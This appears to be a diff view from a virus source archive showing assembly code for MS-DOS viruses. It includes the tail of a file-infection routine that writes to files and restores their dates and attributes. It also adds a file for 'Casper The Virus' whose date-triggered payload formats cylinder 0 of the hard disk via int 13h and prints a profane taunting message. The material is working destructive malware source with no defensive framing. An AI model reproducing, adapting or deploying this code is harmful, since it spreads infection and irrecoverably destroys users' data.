; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov ax,cs
mov ds,ax
mov dx,2A9h
mov ax,4000h
mov cx,3
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_15:
mov ax,5701h
mov cx,word ptr cs:[2ACh]
mov dx,word ptr cs:[2AEh]
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
mov ax,3E00h
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
mov ds,word ptr cs:[2B0h]
mov dx,word ptr cs:[2B2h]
mov cx,word ptr cs:[2B4h]
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
loc_16:
pop di
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp short loc_13
nop
add [bx+si],al
push ax
mov ah,30h ; '0'
int 21h ; DOS Services ah=function 30h
; get DOS version number ax
cmp ax,1E03h
;* je loc_17 ; Jump if equal
db 74h, 09h
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
;* jmp loc_18
db 0E9h, 15h, 00h
test ax,3AA5h
push ss
db 0FEh,0B2h,0B9h, 41h, 20h, 00h
db 0B8h, 00h, 4Ch, 02h, 00h
seg_a ends
end start
MSDOS/U-Index/Virus.MSDOS.Unknown.utility.asm
+33
View File
@@ -0,0 +1,33 @@
;****************************************************************************
;*
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
;* *
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
;* *
;* DETAILS: Date Activated Hard Disk Destroyer. *
;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. *
;* *
;**************************************************************************
mov ah,2ah ; DOS Get Date.
int 21h
cmp dx,0401h ; 5th May.
jne utilend
mov ax,0515h ;Format Cylinder, 15 Sectors.
mov ch,0 ;Cylinder 0.
mov dx,00 ;Head 0, Drive 80h.
mov es,dx ;Junk for address marks.
mov bx,0 ;Junk....
int 13h ;Do It!
int 20h ;Exit
utilend: jmp entry3
db "Hi! I'm Casper The Virus, And On April The 1st I'm "
db "Gonna Fuck Up Your Hard Disk REAL BAD! "
db "In Fact It Might Just Be Impossible To Recover! "
db "How's That Grab Ya! <GRIN>"
entry3: